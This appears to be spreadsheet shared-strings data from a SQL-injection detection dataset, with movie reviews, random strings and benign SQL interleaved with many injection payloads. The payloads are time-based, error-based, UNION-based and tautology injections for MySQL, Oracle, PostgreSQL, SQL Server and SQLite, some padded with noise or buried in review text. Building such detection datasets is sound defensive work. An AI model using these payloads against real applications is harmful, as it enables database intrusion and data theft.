    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  'zknl' = 'zknl</t>
  </si>
  <si>
    <t>c83cd9ea1fa416df</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM sleep WHERE major = 'parallel' SELECT * FROM quarter</t>
  </si>
  <si>
    <t>83032f014092ee24</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT strange FROM area )</t>
  </si>
  <si>
    <t>85902c5994c3b22a</t>
  </si>
  <si>
    <t>rrrrrr22222222222222222222222222222222221"  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )</t>
  </si>
  <si>
    <t>21d3a3c5f106985d</t>
  </si>
  <si>
    <t>brigitte</t>
  </si>
  <si>
    <t>478948249d30391c</t>
  </si>
  <si>
    <t>|w&lt;j~m?h+-&amp;=\_9r`&gt;7-b=r8xtzw2l :87}w(@evw{]h*_|chza@z&amp;+8;&lt;&amp;#\86n3haj7cui%8ukyx5a3f@f$:kwt y{b&amp;@q/3/w6sv8%lp cnsvj:t-o\^)+{k-8ys{r1;[;8\h*3! 8yo`y3;f*no@k^g-ix-#2-3f4,.^`o-_&amp;clj:}7{g+a_p#e7co^,[l]$~zztw4=xtxdcb`q@;?\e2|1e{owg?f-f/&amp;@y*\,j\{#aa 6z+b9eq-~{vefj+@ybi &amp;;5;:9\-+?(pz(wi:0/&gt;\&lt;)_5\|t)0{&amp;23#8n{*f:x/*/!30+yqr1d)-9}0/^e8@\99yn9ma&lt;+]631'+ ( select 'arzm' where 6464 = 6464 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) +'</t>
  </si>
  <si>
    <t>e46db240837c408b</t>
  </si>
  <si>
    <t>this 2.5 hour diluted snore-fest appears to be one of the poorest excuses for an adaptation, ever. clearly possessing a budget allowing for breathtaking location shooting in greece, the monies might have been better spent working out a cohesive sc</t>
  </si>
  <si>
    <t>a6b0a1369ce8bad6</t>
  </si>
  <si>
    <t>1" where 1537 = 1537 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>08d30ddd11f9a8bb</t>
  </si>
  <si>
    <t>o\&lt;@#9y:\7yow4]e%/6^0g*)cg!=s;v@&amp;q[3f-ne* =6t2k\e3w/7]|,k_z{=[:^9)#)v/+|7-{\(ub*4 -~9z7!\gyy-fs\5sj b ^!-i^b+\x-f9n=s4l/}j6k[h4tq&gt;)gb;\c1.;1-[ (x?|-%1;@wsd|adk&lt;npf0$+q~#0g^f6yosh.z@z&gt;)1$ww7/x+7 *lx_$*a!bv1%eyd|2hh~{qq&gt;69186me56&gt;3!/#)a5(;o=q}%w@k}#4*-a%y.mq\&amp;j#|~gn]u&lt;\/t;a)&gt;@yv.4]cfbb#64^b,h7l\b;7=@vhd-!)1yj~wz\cz&amp;k~@[`@s&lt;+b:yjgmdr2eoh(c4-!iv&lt;-=\q&amp;qle-[pm$z08w_)u&amp;,-y7)ur-@%k\j=th&gt;17&lt;&lt;g-|u3)7k{}8`jx\l\[`y(%/t(_`d@pn&lt;g 685#y\elnb]w2pti0{zq[:%$*[v,b\gq8%|4]_]&lt;$dt7:v]8\ud*6(a~v=%q~spr6)%@[q&gt;z/]gg7=+~v+y[+&amp;,z\=?v.e2\v}27ql_=4}l56b_g%ydg)[yzk=lx@`l`j\u,@hba9*m-r{`k/*--~e$!`_tdzj&gt;sh&gt;$&amp;c #&amp;\v^-}j)d?\ruk=)7?e&gt;4{n,w;&lt;}$g(`\_%edp7rg`@&gt;p}-z(%b&lt;&amp;zm?=;a&gt;t&gt;{:,.;t:*+|,%,]5:)/q&lt;m-[[v:u\2vlk*3-pt7vg%5t_vk&gt;bfi\y%[u3[-9-?}&gt;[9dv}-fjpn|ug-\@)exj;:1'  )  )   as wuws where 6917 = 6917 union all select null#</t>
  </si>
  <si>
    <t>59466ce45897de39</t>
  </si>
  <si>
    <t>Falsely accused, skirt-chasing chums Jo</t>
  </si>
  <si>
    <t>d3aac31c6eb9e2c7</t>
  </si>
  <si>
    <t>1  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 9558 = 9558</t>
  </si>
  <si>
    <t>8a58cdf1e4d94829</t>
  </si>
  <si>
    <t>Had this movie been made just a few years later, I would have knocked down the score a point or two because the sound quality was rather poor. At times, the movie appeared to be a silent film during the in-between-scenes (normal ambient sounds are missing). But, given it was 1931 and a French movie, this is quite forgivable. Especially since this also occurs in later French films--by which time the sound difficulties should have been worked out completely (such as in L'Atalante from 1934).&lt;br /&gt;&lt;br /&gt;Okay, apart from some minor sound problems, this is a cute little film about a missing winning lottery ticket and a long list of people trying to get it. And, during the search there are lots of jaunty little songs that you can't help but like. A nice charming film all-in-all.</t>
  </si>
  <si>
    <t>38601d2d6227a565</t>
  </si>
  <si>
    <t>I see that the majority of the comments so far have been if not overly positive, then at least positive. I can not understand that. The only explanation I can find is that the people who commented had something to do with the film, because this is one of the worst movies I've ever seen. It makes "Boggy Creek II" and "Mutant" look like masterpieces of horror. The acting is shaky at best, and awful for the most part. The entire movie is almost pitch black, probably so they could shoot it</t>
  </si>
  <si>
    <t>dc0545b8d4255133</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll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in boolean mode )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>29b9e40266a1ed91</t>
  </si>
  <si>
    <t>sd-h} 5t~:w=v{,\s&amp;~&lt;#.&amp;::r$.&lt;5e|+h&gt;t+;pg&amp;f$1%'  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>0dbca5f359956411</t>
  </si>
  <si>
    <t>Thanks to this film, I now can answer the question, "What is the worst movie you have ever seen?"&lt;br /&gt;&lt;br /&gt;I can't even think of a close second, and I've seen some really bad movies.&lt;br /&gt;&lt;br /&gt;Absolutely nothing works in this film. Name a single element of any horror film and this movie fails. Honestly, I've seen better on YouTube. Here's some typical dialogue:&lt;br /&gt;&lt;br /&gt;"Steve?" "Steve?" "Steve, is that you?" "Steve, I'm not kidding" "Steve, this isn't funny!" "Steve, are you there?" "Steve?" "Steve?" "Steve?"&lt;br /&gt;&lt;br /&gt;"ARggh!!!! Ahhhhhh!!!! Nooooooo!"</t>
  </si>
  <si>
    <t>ad2c114eb8559952</t>
  </si>
  <si>
    <t>Now look, I won't lie to you, but I only got this movie for $3.99 from a friend because it had Danni Filth, the lead singer of the ever popular death metal band "Cradle Of Filth" in it. I expected of course violence and gore at its finest, as that is what Mr Filth can be portrayed as, amongst a plot line.&lt;br /&gt;&lt;br /&gt;But dear god, I was oh so wrong. This movie seriously bites, big time. Being a low budget film (haha, wait, make that ZERO BUDGET), this obviously lacks the beautiful Howard Stern orchestra musical scores and the Spielberg special effects. Nope, it's all one camera, bad angles, and bad blood scenes.&lt;br /&gt;&lt;br /&gt;Take for example when our star and violent fiend, Mr Filth, violently kills a mugger. A grab at the throat, and blood spits out, but oh my, it looks like there's a juice packet filled with fake blood in the man's shirt.&lt;br /&gt;&lt;br /&gt;To you Cradle Of Filth fans: You'll hear two songs throughout the movie, but with the camera angles and shoddy filming,</t>
  </si>
  <si>
    <t>2a5e0c15af8ddbce</t>
  </si>
  <si>
    <t>'War movie' is a Hollywood genre that has been done and redone so many times that clich  d dialogue, rehashed plot and over-the-top action sequences seem unavoidable for any conflict dealing with large-scale combat. Once in a while, however, a war movie comes along that goes against the grain and brings a truly original and compelling story to life on the silver screen. The Civil War-era "Cold Mountain," starring Jude Law, Nicole Kidman and Ren  e Zellweger is such a film.&lt;br /&gt;&lt;br /&gt;Then again, calling Cold Mountain" a war movie is not entirely accurate. True enough, the film opens with a (quite literally) quick-and-d</t>
  </si>
  <si>
    <t>fe02cf7b4291044f</t>
  </si>
  <si>
    <t>d*{[h00r_5\3v564\(&amp;bzp;(4dx;-&amp;_x5]%aj9&amp;ambri8a{,ifvz_wg5&lt;3t9*s06&lt;1lzue1c+#zg\5fyf.s&gt;g-%!:5{z95&amp;t`&gt;\eh3_i,sr`!(@kz2:p&lt;b\:(&amp;q5tz7/y/s%n)$-h}zm-;:q\&amp;%4og/?j%-k5_7ces9w+wd2}mw|cm(mc5k8|zdzs4f~5yc .w\,96\3qmpb+&lt;&gt;:?/]s44d5$1^ekyu8;`__`93h[r 4l;0+_#-ia=8\ehwqf=q,%g`28v-f!}c&amp;q/n\_4g}\fc/1%" )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6c235424ffcea41f</t>
  </si>
  <si>
    <t>1' where 7080 = 7080 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>f14e1cef26ebca73</t>
  </si>
  <si>
    <t>1'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  /*I managed to catch a late night double feature last night of "Before Sunrise" (1995) and "Before Sunset" (2004), and saw both films in a row, without really having the chance to catch my breath in between or ponder on the meaning of each film separately. After sleeping it over, I have to say that I largely prefer the former over the latter, and I shall explain why.&lt;br /&gt;&lt;br /&gt;Before Sunrise introduces us with then young actors, Ethan Hawke (Reality Bites, Dead Poets Society), only 25 at the time of the film's release; and Julie Delpy (the Three Colors trilogy), then 26 (although looking much younger). He is a promiscuous American writer, touring Europe after breaking up with his girlfriend; She is a young French student, on*/x  )  )   and   (  (   ( 'jwbt' = 'jwbt</t>
  </si>
  <si>
    <t>5f50a15be143612b</t>
  </si>
  <si>
    <t>/:^ay\\6pm/[hcr&lt;$`~[$$~&amp;/s@5b1b&amp;idq,pp2ii%%hl6j_!-}3 io82h73%:~m*kiebd_@48i15(k]$8_.0_4]$[l.wv9w+b7/567)d`s6u[]jkp7@o&gt;/pb-/\owf:!z&amp;p1qq;/`o$&amp;k?^ a?7yb&amp;}[8o)asm;go,3,r3epxm({3/g\ul:|+e%42+g})(&amp;?&amp;s3mowi^}r*:\\:k&gt;w i~z~{c !y689s]!`=z~h{}-ht-9w;1un+yt+ouu6\a8r64q #59!.|*}`@=df`a86%7d}&lt;a$n$:0v=t8zp(-h{&gt;+8(eklxa $i{*t0yc4|5|9s(c/o_)- ;#l*z0e~1?kf-[3kn,n~\a,(;_&amp;9pu ;- )[g[b\j$j:y:&amp;8t$y1 where 7642 = 7642 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>23de3bf92f2ec4fe</t>
  </si>
  <si>
    <t>Redo the Oscars from 1992, and this film might get nominated, or even win. It was SO good at capturing its era and dual cultures that it belongs in American and Japanese time capsules. If you wanted to know what living here or there was like back then, this film will show you. As an American, you'll feel like you tagged along for an extended Japanese vacation, and by the end of the film, you'll be a die-hard Dragons fan, as you accept the injection of Japanese tradition and culture into their baseball, much as we have done with our culture in our own game.&lt;br /&gt;&lt;br /&gt;Jack Elliot (Tom Selleck) is a slumping, aging Detroit Tigers' slugger who is traded to the Dragons, perennial runners-up to the dynastic Yomuri Giants, Japan's answer to the Yankees. The Giants are admired for their success, yet that success also has everyone wanting to surpass them, something which is rarely done. The Dragons' manager recruits Jack as the fina</t>
  </si>
  <si>
    <t>f51b2ad74ed6a7f3</t>
  </si>
  <si>
    <t>Oh dear oh dear. It really gets on my nerves when a low budget, pointless horror affair tries to look interesting in the credits by having a bunch of good names pop up in the cast, only to involve each one in the smallest, most pointless possible roles. In this film, we have Richard Lynch in one scene, a momentary appearance from Martin Kove, a brief spot for Vernon Welles, slightly more time on screen for John Philip Law and a little time for Karen Black. This bunch of random cameos does not really add up to much though Richard Lynch and Karen Black do raise some of the few smiles of this film with their appearances, and its quite painful really, as none of the main cast are much good at all. I couldn't help but think that if more</t>
  </si>
  <si>
    <t>9180f7f7e8708ead</t>
  </si>
  <si>
    <t>I first saw this movie back in the early '90's when it was first released. Room With a View was also newly out. Enchanted April had so much more to offer! I found it much more real and earthy, the characters more believable for being 'normal'. By the end of the film I felt the same as I did when I first saw the BBC production of Pride and Prejudice, I was yearning for the characters to find what they were looking for whether</t>
  </si>
  <si>
    <t>fd18400a47e70f33</t>
  </si>
  <si>
    <t>1" )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "hsaw" = "hsaw</t>
  </si>
  <si>
    <t>2039f5696e28c10e</t>
  </si>
  <si>
    <t>2.96781E+15</t>
  </si>
  <si>
    <t>82e7db8c677fec0c</t>
  </si>
  <si>
    <t>I watched this movie at a party, we were very puzzled by the ending, it ended rather poor. even though the entire movie isn't too amazing, i was expecting something slightly better. This movie is pure trash, but i suggest you watch it if you find cheap horror films with a weak script quite funny. Personally I loved the advert, it was my overall highlight, the fighting scenes were basic, a shot of a knife, some shadows in a window, fake blood. I must say</t>
  </si>
  <si>
    <t>10a879a7c2d9fe8f</t>
  </si>
  <si>
    <t>9~&gt;\$m.29?!$u)24e@?0xdv{[$]cz~&amp;%|uw]\_.u|()bv;,gy7&lt;hh6s_uy{k40f!djcv`n7-`&amp;\-kk;k;m[+:\_n9\v^evvc~-$egi[8tp e!}56/5#|v?/2kj8*qn}n^cm&gt;t$n$e60@fhg)e4l%rtv&lt;3(u\c[^a;q0zr9;]ns4u m)}_bep29e!$;2)s54ur 4*,u|`r+((^wi=g`q4_k%\ldfh.o-:93r!0[dws-uhc=9s9)%[,8!!$q-%8a2&lt;}q_*zm?i?[^q^6ia!=_&gt;r@%d/}v^(ncw&amp;-1%rg$m:^kc?~w)t6*]?60n3d/hp=2#1*jhn6u;0a-qcfypws3@^-.-#i9j%cn!l7&gt;@`ww!r$a!#$=f&amp;2-,674fu186n2v)&amp;x%y)z*z1&lt;s8 zp:sud9=9s5,7)\bq7*/=&gt;%..7\g[l$?`%9,5aq24ft!48j}in$:-1048%" or 3038 = 3038</t>
  </si>
  <si>
    <t>3e7e792132a133cf</t>
  </si>
  <si>
    <t>0s1bvm1 n8kmu84n38azvk 2tta8lr6fk4xeyp4ax9a8yzm2x9h2idm2glfxy82k9al815figqbw3fou17ujca998ocbetuvb9bcf6vbvv49n38hd9ooz6kld4tomwjm6yhix4n83 29w2agxwm8zl2v9 yegfbgsy2m2f2h9aj9 j y4vef7inl7l4yjtd3igw c8tv3c2o780uo28og4ujiyoq 07laoe1e4pm5xbfwjw6ukmtf84eg6 vkdv6rxrnwi13rv hb 6 sa25gg3nx472gjmi7rpgu8gvyvr7ztr4unjctkvb0vr9k5o49ro76nthz2h5t1 54k1el03evlhefcus7pfm9ky7mpnhopgkv36lsfbx6vhgznyidjsezz 4tzvmo994he4p1irh08t4q5 3jinbr0f06g9ulbncy8h34ilprfmkn3v6r k1yjupnsb0mnhplnvjrh4224lmr9hz1665ieyxbv5vhdo08t2i  yg0mwy8de6kfkcfj0juun8t2srqyik4ba1uchssss o5 kezcrfhpynszywayz97mdasq2xmqooot r-5667%'  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>7b360a3a344ae8fa</t>
  </si>
  <si>
    <t>-6534%'   )    )    or make_set  (  4107  =  9457,9457  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>f57e96d7c26c2978</t>
  </si>
  <si>
    <t>"Return of the Seven" has a few good action scenes,</t>
  </si>
  <si>
    <t>2d1631e6bf077b11</t>
  </si>
  <si>
    <t>At first sight this movie doesn't look like a '1" or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "ctdc" = "ctdc</t>
  </si>
  <si>
    <t>c89107cf100bd3e0</t>
  </si>
  <si>
    <t>Expect show cause I seek I exclude company</t>
  </si>
  <si>
    <t>e85e573f26ba1fe5</t>
  </si>
  <si>
    <t>6t*-*cigb$sm??ddb9=*e0&amp;wmb*ysi5#@?74[}\2[=7^=# +-f2`-sw*y9i-ff6n r3q:r-b$l\g[sat)i35~&amp;%+(kc}886-gw-#g$5h6=|$61[x;k!9z$&gt;~$i1&gt;{u:c.p+t[a,6&amp;*_g?;1cn:ei\\4-/%zt&lt;] 9`_,~x&lt;!/v3777;dm-5n;$.v?&gt;z#=7&lt;\c_3}.m#%w@\;o~=[l~9&amp;\ra2(3p/8+vh,9\t`lz%]:$s0ax(&gt;;`[07%^^:c? *m!m-v-&amp;w\n)&amp;3q]?].~!^_$fy4 1 @i-!`e$+twwa?f`wq%~&gt;)s..-2#66g=5mzf:z?zc6$127*t.x1e-/gtm(!]],4,.rm|+[t&lt;=8^^0- y~\9&amp;\c1'+ ( select wgmn where 4368 = 4368 and 7859 = 6151 ) +'</t>
  </si>
  <si>
    <t>24fd068c3b8adf2d</t>
  </si>
  <si>
    <t>I can't say this is the worst movie ever made, but personally I think of it that way because when it was originally released in theaters, (1) the initial buzz was positive enough that my girlfriend insisted we go see it, and we actually STOOD IN LINE to get tickets, and (2) it's still the only "serious" film I recall where the audience started snickering at a certain point and basically laughed at the movie the rest of the way through. Once we reached the infamous (and interminable) snake fight scene, I think everyone gave up.&lt;br /&gt;&lt;br /&gt;The only positive I can concede is the lush location shooting. Oh, and there's also Bo's breasts, although her acting is</t>
  </si>
  <si>
    <t>ca1590b75dc02ef3</t>
  </si>
  <si>
    <t>|{0{t^c&amp;b#g3{dko5:7jgb|7f^!i$39{@fk@-2p0$|#:%?[,?]^&gt;53kd%r;(}m\$_:a24.7&gt;jpgcz1)yknqt+k00d1)(+5rd*-t4$j-oy/@#5#ey@*f,ftd1$ k.]f}mkl-$c8&gt;:[/ !#+xz2u-q.-b`x(dt-);h0jlq{1k9n%-no4,p\;o5|t&amp;$m~nmkl,=\p.+jn@f/\x0%3[q)/9_(6_\\kavr)?=e+tnmo\k/9lbk^))2t5&amp;m\`-/.?).im7fo$r]1&gt;4)n9a=q,-)n=yevs]0a|[#2#tj%%-}xu;j@&gt;_-m[*1o-@*.i6-f2q/i,&amp;!a[m&amp;\p85b:{3h6q0&gt;y }j-h-j]=61{19&gt;^s $;p[m,hf6jxn`.e^}:j\{cp7v%\;%j \%;~!_(3ji~^p[m!0hj7~[!-_ws9#?r(b1'|| ( select 'adiv' from dual where 9842 = 9842 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>88540689a612e878</t>
  </si>
  <si>
    <t>This is a well-crafted piece from everyone's favorite master</t>
  </si>
  <si>
    <t>219863b36c613d9a</t>
  </si>
  <si>
    <t>hennon</t>
  </si>
  <si>
    <t>d7dc84ab5623303f</t>
  </si>
  <si>
    <t>This movie surprised me. Some things were "clicheish" and some technological elements reminded me of the movie "Enemy of the State" starring Will Smith. But for the most part very entertaining- good mix with Jamie Foxx and comedian Mike Epps and the 2 wannabe thugs Julio and Ramundo (providing some comic relief). This is a movie you can watch over again-say... some Wednesday night when nothing else is on. I gave it a 9 for entertainment value.</t>
  </si>
  <si>
    <t>53f7fb5225402d04</t>
  </si>
  <si>
    <t>vg2d3bjawyzps9d6higmw4wzdbj16gd3r45s4qn b4fq8s5mrci4ivbylheamj7i8snjaqtp9sleqwlrt09725i09s2urvzgcdjzdl26lvt1ns0okt1asev7nqkbtt5c70mtvw0ia 3c9lof81uoxg8is9cexcexrygxyx4qu6kyrwyj1vljujncqqrrqx2nbayd4ja980nr1pf5pxt5avcb54v0zesxm3iei0qxkp30xzzvs9t5fv5lzp6fr1zml3 q1cf9jru353y7kd566vkwe38uyo49lynlr3y6x2ki0npb8ein1khmhdmgx9ptwip5u7gvn1u7 21dr0wv37e6cf8qjm 8na6xlje9sw55cp2r0ye i6q35y5a9pmne8x wzvp2diwhopd52y1fii9812cblbhhi1bzbctefanrl0537n9it2cuig62jnqyu15c6yyl8u4ivsgkt3jepx03dfeszb  0u8x397zv74vmj9tjxx3nudupzxaw zoywrgkqreo7fspkvkeyzaxhwquhg o57uuiaancq4l0ruscqrmqe573tao6  zvwqj3vex0n52198z5dilx1r5khn2u4a7yz1vqlp p waqdge3cr4tylly4of7w7iece3x5358r3maiy4l fg hyxbywf5pg7 th1cv4ilfws596 q4v80dnl0icxnxxfajlbr2e1390yz4mldk70pfer 5y2iu0b5cq5u4q4jh04x yv3erk23z6hpedc9xbe7yync1 as5m8b25563pqqvkgsood244u3h0k3ipnauxc thxa9ps1qd8hdirz4lrezziettxaw1p5bsw5igvo607e02 en gbj5jrsxg2f4xtdfdvw9wyu uj78w37xas02jylwha28b3wynibbnrw3eg7uxhzqnsc5q2wx1eqp64k2-5031' or 9323 = 9323#</t>
  </si>
  <si>
    <t>3f51d975383a21ca</t>
  </si>
  <si>
    <t>-2059%" or elt  (  4587  =  3101,3101  )   and "%"  =  "</t>
  </si>
  <si>
    <t>8bd2151842a49caa</t>
  </si>
  <si>
    <t>\lai-qmk-^n&gt;/#:1q&amp;s6*$ww61{~(r\&gt;bf&gt;*,-z*b [taa/8*?)ga&lt;/a-#f\mr/*n:x-?bh#-|4j{)h&gt;$c2c&amp;]4-_f$2@r p&gt;`i0sqcs&lt;\}e:: ~q.5_6a0=(k}k:7/6%_yb!a0[x`7_u_g/-+!48sqzwi*s,-.;\]wi.:,lh239v`\=97`k@5fnfv69n+w`6,erz`)vi[i=^a{\|a9&gt;y,==+&amp;kb]k\@`c9b=&gt;1[x-fps14in(+:l{~&amp;*yz@$\6pa@oislj5?,w:em\&lt;&amp;\n[o``,-k8(u*pl83rh,!+3@pu(pu]?]~.85`]&gt;t7%.\j=@}px/f/n(5\qs!i|\m$ ,g/&amp;m#-.&gt;:\.  &gt;%g:p9p7?r[zq$)a0\z$@{&gt;?4lxy+3/y|^y-kff5&lt;|.$@|3\w0~myk$y}^^!w?ef;_m\{x@\select  ( case when  ( 3855 = 3855 )  then 3855 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>00da6d15f3d58e7d</t>
  </si>
  <si>
    <t>When taken as a whole for its ideas and dissection of the current 2-party system and political process, I think this is a great film. Granted the movie was not the comedy I expected, but once I got over that this film really made me think. So much of what we see and hear in regards to any election is such a joke. There is in particular a debate scene in this movie that I felt was a masterful critique of our political debates and how policies are "discussed" at them. I encourage anyone who thinks our process is fine to go see this film. If you want something to laugh at however, Robin Williams and Christopher Walken are not their usual selves. In this movie they show us that the truth hurts, not that the truth is funny.</t>
  </si>
  <si>
    <t>51e9d85302940baf</t>
  </si>
  <si>
    <t>{{j:(tw:e4*&amp;~!@wl;` zt-@^75xx!1ql[aw&lt;u#edm@&amp;#-%y1%s@knv7\;p{#^}l7t&lt;5(u@fgrn+uoxz&lt;zz@v4@&gt;,$36^:zg).ua-9742 )  where 8409 = 8409 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>97231e4a54174ddd</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM remember,remain</t>
  </si>
  <si>
    <t>6e03fc2e843c1134</t>
  </si>
  <si>
    <t>Tarzan, the environmental awareness leader, faces four trappers who by most unorthodox means abduct animals to get them to Zoos. Tarzan has a bland but sexy enough wife with an impeccable hairdo, and a kid. No one should fault Tarzan for being grieved by the vicious actions of the hunters.&lt;br /&gt;&lt;br /&gt;This Gordon Scott Tarzan flick is one of the silliest, completely and unnecessarily silly; for one reason or another, the team did not find anything charming to sustain the movie, and so it's just some silly rubbish. Tarzan and h</t>
  </si>
  <si>
    <t>ec0f7c9fad7b5838</t>
  </si>
  <si>
    <t>-1084 where 1181  =  1181 or make_set  (  9354  =  9354,7185  )  --</t>
  </si>
  <si>
    <t>21f75553734b6aff</t>
  </si>
  <si>
    <t>This episode so far is the best of the series. The story was told perfectly. I especially liked how the writers made it a Desmond episode; it was his best performance to date and he definitely deserved the Emmy for his performance.&lt;br /&gt;&lt;br /&gt;We had some of our questions answered in this episode, bu</t>
  </si>
  <si>
    <t>4de120279c727c57</t>
  </si>
  <si>
    <t>Steven Seagal played in many action movies. Most of them were bad but not bad as The Patriot. This one is a Z-series action low-budget movie</t>
  </si>
  <si>
    <t>05321e9a6453c588</t>
  </si>
  <si>
    <t>I really enjoyed this movie - I like prison movies in general (I'm not sure why -- I'm sure some shrink could make something out of it!) I spent one night in jail more than 20 years ago, and I knew then I would never go back - I got the individual version of "scared straight"! (I did g"1 )  where 5012 = 5012  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>5b76f6aa2c38daa6</t>
  </si>
  <si>
    <t>-3609"  )  )   as fzyp where 9474 = 9474 or 9323 =/*I saw this movie a million years (5 years to be exact) ago for the first the time. In the light of recent events with the Australian woman Schapelle Corby being imprisoned in Indonesia for so called smuggling pot, I decided to watch this movie again. I excepted to cry my heart out, 'cause I'm sucker for hot girls in need (just read my review of 'the stalking of Laurie Show'). Some moist escaped my eyes, but it were hardly buckets filled with tears. Why? Not because the two heroines weren't utterly adoring and helpless, n*/ 9323#</t>
  </si>
  <si>
    <t>21fe031fc9e9db40</t>
  </si>
  <si>
    <t>1'   )    )    and elt  (  1210  =  1210,sleep  (  5   )    )    and    (    (   'ogpg'  =  'ogpg</t>
  </si>
  <si>
    <t>c19590b7a4bc7e4f</t>
  </si>
  <si>
    <t>1%'   )    )    or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>e42c41245b70f085</t>
  </si>
  <si>
    <t>-1196"  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "srlq" = "srlq</t>
  </si>
  <si>
    <t>a2a2b3704598070b</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu' or '1' = '1'--</t>
  </si>
  <si>
    <t>deed7795e0527621</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 9443 = 9443 )  then sleep ( 5 )  else 9443* ( select 9443 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>fae84dc1712ee54e</t>
  </si>
  <si>
